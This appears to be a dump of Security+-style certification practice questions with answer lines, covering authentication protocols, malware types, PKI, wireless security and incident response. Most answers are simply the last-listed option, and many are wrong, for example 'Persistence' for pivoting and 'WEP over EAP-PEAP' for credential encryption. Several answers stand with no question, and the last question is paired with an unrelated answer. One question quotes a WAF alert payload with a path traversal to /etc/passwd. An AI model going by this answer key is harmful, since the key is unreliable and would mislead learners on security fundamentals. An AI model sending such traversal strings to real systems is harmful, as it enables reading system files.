Which of the following BEST explains why sandboxing is a best practice for testing software from an untested vendor prior to an enterprise deployment? A. It allows the software to run in an unconstrained environment with full network access B. It eliminates the possibility of privilege escalation attacks against the local VM host C. It facilitates the analysis of possible malware by allowing it to run until resources are exhausted D. It restricts access of the software to a contained logical space and limits possible damage
D. It restricts access of the software to a contained logical space and limits possible damage
Which of the following is true about input validation in a client-server architecture, when data integrity is critical to the organization? A. It should be enforced on the client side only. B. It must be protected by SSL encryption. C. It must rely on the user's knowledge of the application. D. It should be performed on the server side.
D. It should be performed on the server side.
A security analyst receives an alert from a WAF with the following payload: var data = "<test test test> ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this? A. Cross-site request forgery B. Buffer overflow C. SQL injection D. JavaScript data insertion E. Firewall evasion script
D. JavaScript data insertion
Which of the following authentication services requires the use of a ticket-granting ticket (TGT) server in order to complete the authentication process? A. TACACS+ B. Secure LDAP C. RADIUS D. Kerberos
D. Kerberos
Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine? A. Ransomware B. Rootkit C. Backdoor D. Keylogger
D. Keylogger
A system administrator is configuring UNIX accounts to authenticate against an external server. The configuration file asks for the following information DC=ServerName and DC=COM. Which of the following authentication services is being used? A. RADIUS B. SAML C. TACACS+ D. LDAP
D. LDAP
Which of the following was based on a previous X.500 specification and allows either unencrypted authentication or encrypted authentication through the use of TLS? A. Kerberos B. TACACS+ C. RADIUS D. LDAP
D. LDAP
Jane, a security administrator, needs to implement a secure wireless authentication method that uses a remote RADIUS server for authentication. Which of the following is an authentication method Jane should use? A. WPA2-PSK B. WEP-PSK C. CCMP D. LEAP
D. LEAP
A company is looking to improve their security posture by addressing risks uncovered by a recent penetration test. Which of the following risks is MOST likely to affect the business on a day-to-day basis? A. Insufficient encryption methods B. Large scale natural disasters C. Corporate espionage D. Lack of antivirus software
D. Lack of antivirus software
A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur? A. Impersonation B. Credential harvesting C. Password cracking D. Lateral movement
D. Lateral movement
A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer? A. Round-robin B. Weighted C. Least connection D. Locality-based
D. Locality-based
This condition exists when data units can travel from a first LAN segment to a second LAN segment through more than one path and is solved by STP? A. Logic bomb B. Flooding C. MAC spoofing D. Looping
D. Looping
Which of the following should Pete, a security manager, implement to reduce the risk of employees working in collusion to embezzle funds from their company? A. Privacy Policy B. Least Privilege C. Acceptable Use D. Mandatory Vacations
D. Mandatory Vacations
B. Dumpster diving
D. Mantrap
A network administrator is creating a new network for an office. For security purposes, each department should have its resources isolated from every other department but be able to communicate back to central servers. Which of the following architecture concepts would BEST accomplish this? A. Air gapped network B. Load balanced network C. Network address translation D. Network segmentation
D. Network segmentation
A company is implementing an internal PKI. The design will include a CA and a subordinate CA. Which of the following CA design choices should be considered prior to implementation? A. Wildcard vs. standard certificate B. Subject field vs. subject alternative name field C. Private vs. public D. Online vs. offline E. Stapling vs. pinning
D. Online vs. offline
Ann is the IS manager for several new systems in which the classification of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? A. Steward B. Custodian C. User D. Owner
D. Owner
A company wants to implement a wireless network with the following requirements: All wireless users will have a unique credential. User certificates will not be required for authentication. The company's AAA infrastructure must be utilized. Local hosts should not store authentication tokens. Which of the following should be used in the design to meet the requirements? A. EAP-TLS B. WPS C. PSK D. PEAP
D. PEAP
An office manager found a folder that included documents with various types of data relating to corporate clients. The office manager notified the data included dates of birth, addresses, and phone numbers for the clients. The office manager then reported this finding to the security compliance officer. Which of the following portions of the policy would the security officer need to consult to determine if a breach has occurred? A. Public B. Private C. PHI D. PII
D. PII
Which of the following would provide additional security by adding another factor to a smart card? A. Token B. Proximity badge C. Physical key D. PIN
D. PIN
An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using? A. SaaS B. CASB C. IaaS D. PaaS
D. PaaS
Users can authenticate to a company's web applications using their credentials from a popular social media site. Which of the following poses the greatest risk with this integration? A. Malicious users can exploit local corporate credentials with their social media credentials B. Changes to passwords on the social media site can be delayed from replicating to the company C. Data loss from the corporate servers can create legal liabilities with the social media site D. Password breaches to the social media site affect the company application as well
D. Password breaches to the social media site affect the company application as well
After a company has standardized to a single operating system, not all servers are immune to a well-known OS vulnerability. Which of the following solutions would mitigate this issue? A. Host based firewall B. Initial baseline configurations C. Discretionary access control D. Patch management system
D. Patch management system
A penetration tester uses an exploited network printer as a base of operations to expand access to various workstations. Which of the following BEST describes the tester's actions? A. Pivoting B. Passive reconnaissance C. Active reconnaissance D. Persistence
D. Persistence
A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause? A. Insufficient key bit length B. Weak cipher suite C. Unauthenticated encryption method D. Poor implementation
D. Poor implementation
A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. The session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack? A. Domain hijacking B. Injection C. Buffer overflow D. Privilege escalation
D. Privilege escalation
An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identity proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners? A. Guest account B. User account C. Shared account D. Privileged user account E. Default account F. Service account
D. Privileged user account
Also known as packet sniffers, these tools help you troubleshoot network issues by gathering packet-level information across the network? A. Vulnerability scanners B. Exploitation frameworks C. Configuration compliance D. Protocol analyzers
D. Protocol analyzers
Which of the following should the security administrator implement to limit web traffic based on country of origin? (Select THREE). A. Spam filter B. Load balancer C. Antivirus D. Proxies E. Firewall F. NIDS G. URL filtering
D. Proxies E. Firewall G. URL filtering
A CRL is comprised of. A. Malicious IP addresses. B. Trusted CA's. C. Untrusted private keys. D. Public keys.
D. Public keys.
Joe recently assumed the role of data custodian for his organization. While cleaning out an unused storage safe, he discovers several hard drives that are labeled "unclassified" and awaiting destruction. The hard drives are obsolete and cannot be installed in any of his current computing equipment. Which of the following is the BEST method for disposing of the hard drives? A. Burning B. Wiping C. Purging D. Pulverizing
D. Pulverizing
Which of the following is an authentication service that uses UDP as a transport medium? A. TACACS+ B. LDAP C. Kerberos D. RADIUS
D. RADIUS
A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile devices prior to providing the user with a captive portal login. Which of the following should the systems administrator configure? A. L2TP with MAC filtering B. EAP-TTLS C. WPA2-CCMP with PSK D. RADIUS federation
D. RADIUS federation
A user, Ann, is reporting to the company IT support group that her workstation screen is blank other than a window with a message requesting payment or else her hard drive will be formatted. Which of the following types of malware is on Ann's workstation? A. Trojan B. Spyware C. Adware D. Ransomware
D. Ransomware
Deploying a wildcard certificate is one strategy to: A. Secure the certificate's private key. B. Increase the certificate's encryption key length. C. Extend the renewal date of the certificate. D. Reduce the certificate management burden.
D. Reduce the certificate management burden.
A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact? A. Launch an investigation to identify the attacking host B. Initiate the incident response plan C. Review lessons learned captured in the process D. Remove malware and restore the system to normal operation
D. Remove malware and restore the system to normal operation
Of the below terms, which one best describes the type of attack that captures portions of a session to play back later to convince a host that it continues to communicate with the original system? A. IP hijacking B. Jamming C. Trojan D. Replay
D. Replay
An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate actions to take? A. Flip the documents face down so no one knows these documents are PII sensitive B. Shred the documents and let the owner print the new set C. Retrieve the documents, label them with a PII cover sheet, and return them to the printer D. Report to the human resources manager that their personnel are violating a privacy policy
D. Report to the human resources manager that their personnel are violating a privacy policy
Pete, the security engineer, would like to prevent wireless attacks on his network. Pete has implemented a security control to limit the connecting MAC addresses to a single port. Which of the following wireless attacks would this address? A. Interference B. Man-in-the-middle C. ARP poisoning D. Rogue access point
D. Rogue access point
The security administrator is currently unaware of an incident that occurred a week ago. Which of the following will ensure the administrator is notified in a timely manner in the future? A. User permissions reviews B. Incident response team C. Change management D. Routine auditing
D. Routine auditing
Ann has read and write access to an employee database, while Joe has only read access. Ann is leaving for a conference. Which of the following types of authorization could be utilized to trigger write access for Joe when Ann is absent? A. Mandatory access control B. Role-based access control C. Discretionary access control D. Rule-based access control
D. Rule-based access control
A website form is used to register new students at a university. The form passed the unsanitized values entered by the user and uses them to directly add the student's information to several core systems. Which of the following attacks can be used to gain further access due to this practice? A. Cross-site request forgeries B. XSS attacks C. MITM attacks D. SQL injection
D. SQL injection
Which of the following is BEST used as a secure replacement for TELNET? A. HTTPS B. HMAC C. GPG D. SSH
D. SSH
A security administrator needs to determine which system a particular user is trying to login to at various times of the day. Which of the following log types would the administrator check? A. Firewall B. Application C. IDS D. Security
D. Security
Sara, a company's security officer, often receives reports of unauthorized personnel having access codes to the cipher locks of secure areas in the building. Sara should immediately implement which of the following? A. Acceptable Use Policy B. Physical security controls C. Technical controls D. Security awareness training
D. Security awareness training
A user in the company is in charge of various financial roles but needs to prepare for an upcoming audit. They use the same account to access each financial system. Which of the following security controls will MOST likely be implemented within the company? A. Account lockout policy B. Account password enforcement C. Password complexity enabled D. Separation of duties
D. Separation of duties
To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed? A. Least privilege B. Job rotation C. Background checks D. Separation of duties
D. Separation of duties
b. zero-day attack
D. Site-to site VPN
A Chief Executive Officer (CEO) of an organization receives an email stating the CEO's account may have been compromised. The email further directs the CEO to click on a link to update the account credentials. Which of the following types of attacks has MOST likely occurred? A. Pharming B. Hoax C. Whaling D. Spear phishing
D. Spear phishing
A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement? A. Shared accounts B. Preshared passwords C. Least privilege D. Sponsored guest
D. Sponsored guest
Which of the following can be used to mitigate risk if a mobile device is lost? A. Cable lock B. Transport encryption C. Voice encryption D. Strong passwords
D. Strong passwords
Which of the following concepts is BEST described as developing a new chain of command in the event of a contingency? A. Business continuity planning B. Continuity of operations C. Business impact analysis D. Succession planning
D. Succession planning
Which of the following is a difference between TFTP and FTP? A. TFTP is slower than FTP. B. TFTP is more secure than FTP. C. TFTP utilizes TCP and FTP uses UDP. D. TFTP utilizes UDP and FTP uses TCP.
D. TFTP utilizes UDP and FTP uses TCP.
A security engineer, Joe, has been asked to create a secure connection between his mail server and the mail server of a business partner. Which of the following protocol would be MOST appropriate? A. HTTPS B. SSH C. FTP D. TLS
D. TLS
Ann, security analyst, wants to implement a secure exchange of email. Which of the following is the BEST option for Ann to implement? A. PGP B. HTTPS C. WPA D. TLS
D. TLS
Which of the following transportation encryption protocols should be used to ensure maximum security between a web browser and a web server? A. SSLv2 B. SSHv1 C. RSA D. TLS
D. TLS
Which of the following would be used when a higher level of security is desired for encryption key storage? A. TACACS+ B. L2TP C. LDAP D. TPM
D. TPM
Which of the following staging environments is MOST likely to be a one-to-one mapping with the production environment and used for testing and validation prior to "go live"? A. Quality assurance B. Development C. Production D. Test
D. Test
On Monday, all company employees report being unable to connect to the corporate wireless network, which uses 802.1x with PEAP. A technician verifies that no configuration changes were made to the wireless network and its supporting infrastructure, and that there are no outages. Which of the following is the MOST likely cause for this issue? A. Too many incorrect authentication attempts have caused users to be temporarily disabled. B. The DNS server is overwhelmed with connections and is unable to respond to queries. C. The company IDS detected a wireless attack and disabled the wireless network. D. The Remote Authentication Dial-In User Service server certificate has expired.
D. The Remote Authentication Dial-In User Service server certificate has expired
Which of the following BEST describes the weakness in WEP encryption? A. The initialization vector of WEP uses a crack-able RC4 encryption algorithm. Once enough packets are captured an XOR operation can be performed and the asymmetric keys can be derived. B. The WEP key is stored in plain text and split in portions across 224 packets of random data. Once enough packets are sniffed the IV portion of the packets can be removed leaving the plain text key. C. The WEP key has a weak MD4 hashing algorithm used. A simple rainbow table can be used to generate key possibilities due to MD4 collisions. D. The WEP key is stored with a very small pool of random numbers to make the cipher text. As the random numbers are often reused it becomes easy to derive the remaining WEP key.
D. The WEP key is stored with a very small pool of random numbers to make the cipher text. As the random numbers are often reused it becomes easy to derive the remaining WEP key.
A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: The computer has not reported status in 30 days. Given this scenario, which of the following statements BEST represents the issue with the output above? A. The computer in question has not pulled the latest ACL policies for the firewall. B. The computer in question has not pulled the latest GPO policies from the management server. C. The computer in question has not pulled the latest antivirus definitions from the antivirus program. D. The computer in question has not pulled the latest application software updates.
D. The computer in question has not pulled the latest application software updates.
After an employee reported slow network speeds and application responsiveness, the help desk asked the company's security administrator to review the following firewall logs from the employee's computer: 2017-05-30 12:12:31 ALLOW TCP 192.168.1.236 192.168.1.1 30295 21 2017-05-30 12:12:32 ALLOW TCP 192.168.1.236 192.168.1.1 30296 22 2017-05-30 12:12:33 ALLOW TCP 192.168.1.236 192.168.1.1 30296 25 2017-05-30 12:12:33 ALLOW TCP 192.168.1.236 192.168.1.1 30297 80 2017-05-30 12:12:33 DROP TCP 84.176.55.103 192.168.1.236 10434 445 Which of the following can the security administrator infer and report to the help desk based on the above logs? A. The employee's computer is being actively scanned. B. The employee's computer is infected with a worm. C. The employee's computer firewall should be enabled. D. The computer's router is actively listening to unneeded services.
D. The computer's router is actively listening to unneeded services.
The payroll department has contacted the security team regarding an anomaly with amounts paid via the weekly payroll file. The security analyst is provided the following log from the server. Time Source IP File Path Action 1/1/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/1/16 3:15:23 172.14.89.12 C:\ACH\payrolll.xls File transferred 1/7/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/7/16 3:15:23 172.14.89.12 C:\ACH\payrolll.xls File transferred 1/14/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/14/16 9:51:34 10.10.24.156 C:\ACH\payrolll.xls File modified 1/14/16 3:10:29 172.14.89.12 C:\ACH\payrolll.xls Transfer failed 1/14/16 4:10:52 172.14.89.12 C:\ACH\payrolll.xls File transferred 1/21/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/21/16 3:45:01 172.14.89.12 C:\ACH\payrolll.xls File transferred 1/28/16 9:24:10 10.10.24.156 C:\ACH\payrolll.xls File created 1/28/16 9:45:23 10.10.24.156 C:\ACH\payrolll.xls File modified 1/28/16 10:23:52 17.23.45.29 C:\ACH\payrolll.xls File modified 1/28/16 3:22:15 172.14.89.12 C:\ACH\payrolll.xls File transferred Which of the following is the MOST likely reason for the anomaly? A. The file was corrupted in transit. B. The file was transferred to the wrong destination. C. The connection was refused by the destination. D. The file was compromised before being sent.
D. The file was compromised before being sent.
A security engineer at a manufacturing company is implementing a third-party cloud application. Rather than create users manually in the application, the engineer decides to use the SAML protocol. Which of the following is being used for this implementation? A. The manufacturing company is the service provider, and the cloud company is the identity provider. B. The manufacturing company is the authorization provider, and the cloud company is the service provider. C. The manufacturing company is the identity provider, and the cloud company is the OAuth provider. D. The manufacturing company is the identity provider, and the cloud company is the service provider. E. The manufacturing company is the service provider, and the cloud company is the authorization provider.
D. The manufacturing company is the identity provider, and the cloud company is the service provider.
A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO) A. Privileged-user certificates were used to scan the host B. Non-applicable plug ins were selected in the scan policy C. The incorrect audit file was used D. The output of the report contains false positives E. The target host has been compromised
D. The output of the report contains false positives E. The target host has been compromised
In determining when it may be necessary to perform a credentialed scan against a system instead of a noncredentialed scan, which of the following requirements is MOST likely to influence its decisions? A. The scanner must be able to enumerate the host OS of devices scanner B. The scanner must be able to footprint the network C. The scanner must be able to check for open ports with listening services D. The scanner must be able to audit file system permissions
D. The scanner must be able to audit file system permissions
A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect? A. The server will be unable to serve clients due to lack of bandwidth B. the server's firewall will be unable to effectively filter traffic due to the amount of data transmitted C. The server will crash when trying to reassemble all the fragmented packets D. The server will exhaust its memory maintaining half-open connections
D. The server will exhaust its memory maintaining half-open connections
A systems administrator is installing a new server in a large datacenter. Which of the following BEST describes the importance of properly positioning servers in the rack to maintain availability? A. To allow for visibilty of the servers' status indicators B. To adhere to cable management standards C. To maximize the fire suppression system's efficiency D. To provide consistent air flow
D. To provide consistent air flow
LDAP and Kerberos are commonly used for which of the following? A. To perform queries on a directory service B. To store usernames and passwords for Federated Identity C. To sign SSL wildcard certificates for subdomains D. To utilize single sign-on capabilities
D. To utilize single sign-on capabilities
An organization has had problems keeping track of new devices being placed on the network. Which of the following tools should be used to identify where devices reside on the network? A. Tcpdump B. Nslookup C. Nmap D. Tracert
D. Tracert
Sara, the Chief Security Officer (CSO), has had four security breaches during the past two years. Each breach has cost the company $3,000. A third party vendor has offered to repair the security hole in the system for $25,000. The breached system is scheduled to be replaced in five years. Which of the following should Sara do to address the risk? A. Accept the risk saving $10,000. B. Ignore the risk saving $5,000. C. Mitigate the risk saving $10,000. D. Transfer the risk saving $5,000.
D. Transfer the risk saving $5,000.
A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming Internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space? A. Misconfigured devices B. Logs and events anomalies C. Authentication issues D. Unauthorized software
D. Unauthorized software
A security analyst, who is analyzing the security of the company's web server, receives the following output: POST http://www.acme.com/AuthenticationServlet HTTP/1.1 HOST: www.acme.com accept: text/xml, application/xml, application/xhtml + xml Keep-Alive: 300 Connection: keep-alive Referer: http//acme.com/index.jsp Cookie: JSESSIONID+LvzZRJJXgwyWPWEQMhS49vtW1yJdvn78CG1Kp5jTvvChDyPknm4t ! Content-type: application/x-www-form-urlencoded Content-length: 64 delegate_service=131&user=acme1&pass=test&submit=SUBMIT Which of the following is the issue A. Code signing B. Stored procedures C. Access violations D. Unencrypted credentials
D. Unencrypted credentials
A forensics expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take to protect the chain of custody? A. Make a forensic copy B. Create a hash of the hard drive C. Recover the hard drive data D. Update the evidence log
D. Update the evidence log
An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome? A. Use a protocol analyzer to reconstruct the data and implement a web-proxy. B. Deploy a web-proxy and then blacklist the IP on the firewall. C. Deploy a web-proxy and implement IPS at the network edge. D. Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
D. Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed? A. Removing the hard drive from its enclosure B. Using software to repeatedly rewrite over the disk space C. Using Blowfish encryption on the hard drives D. Using magnetic fields to erase the data
D. Using magnetic fields to erase the data
A Chief Information Security Officer (CISO) asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO? A. VPN B. PaaS C. IaaS D. VDI
D. VDI
Which of the following solutions provides the most flexibility when testing new security controls prior to implementation? A. Trusted OS B. Host software baselining C. OS hardening D. Virtualization
D. Virtualization
Jane, an individual, has recently been calling various financial offices pretending to be another person to gain financial information. Which of the following attacks is being described? A. Phishing B. Tailgating C. Pharming D. Vishing
D. Vishing
A security administrator must implement a network authentication solution which will ensure encryption of user credentials when users enter their username and password to authenticate to the network. Which of the following should the administrator implement? A. WPA2 over EAP-TTLS B. WPA-PSK C. WPA2 with WPS D. WEP over EAP-PEAP
D. WEP over EAP-PEAP
When developing an application, executing a preconfigured set of instructions is known as: A. a code library. B. code signing. C. a stored procedure. D. infrastructure as code.
D. infrastructure as code.
A security administrator is performing a test to determine if a server is vulnerable to compromise through unnecessary ports. Which of the following tools would assist the security administrator in gathering the required information? A. tcpdump B. netcat C. nslookup D. nmap E. dig
D. nmap
Hacktivists are most commonly motivated by: A. curiosity B. notoriety. C. financial gain. D. political cause.
D. political cause.
After the integrity of a patch has been verified, but before being deployed to production, it is important to: A. perform static analysis B. reverse engineer it for embedded malware. C. run dynamic analysis on the executable. D. test it in a staging environment
D. test it in a staging environment
Access mechanisms to data on encrypted USB hard drives must be implemented correctly otherwise: A. user accounts may be inadvertently locked out. B. data on the USB drive could be corrupted. C. data on the hard drive will be vulnerable to log analysis. D. the security controls on the USB drive can be bypassed.
D. the security controls on the USB drive can be bypassed.
A small company can only afford to buy an all-in-one wireless router/switch. The company has 3 wireless BYOD users and 2 web servers without wireless access. Which of the following should the company configure to protect the servers from the user devices? (Select TWO). A. Deny incoming connections to the outside router interface. B. Change the default HTTP port C. Implement EAP-TLS to establish mutual authentication D. Disable the physical switch ports E. Create a server VLAN F. Create an ACL to access the server
E. Create a server VLAN F. Create an ACL to access the server
Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken FIRST? (Select TWO) A. Disable the compromised accounts B. Update WAF rules to block social networks C. Remove the compromised accounts with all AD groups D. Change the compromised accounts' passwords E. Disable the open relay on the email server F. Enable sender policy framework
E. Disable the open relay on the email server F. Enable sender policy framework
Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request? A. Retinal scan B. Passphrase C. Token fob D. Security question
SFTP (uses SSH)
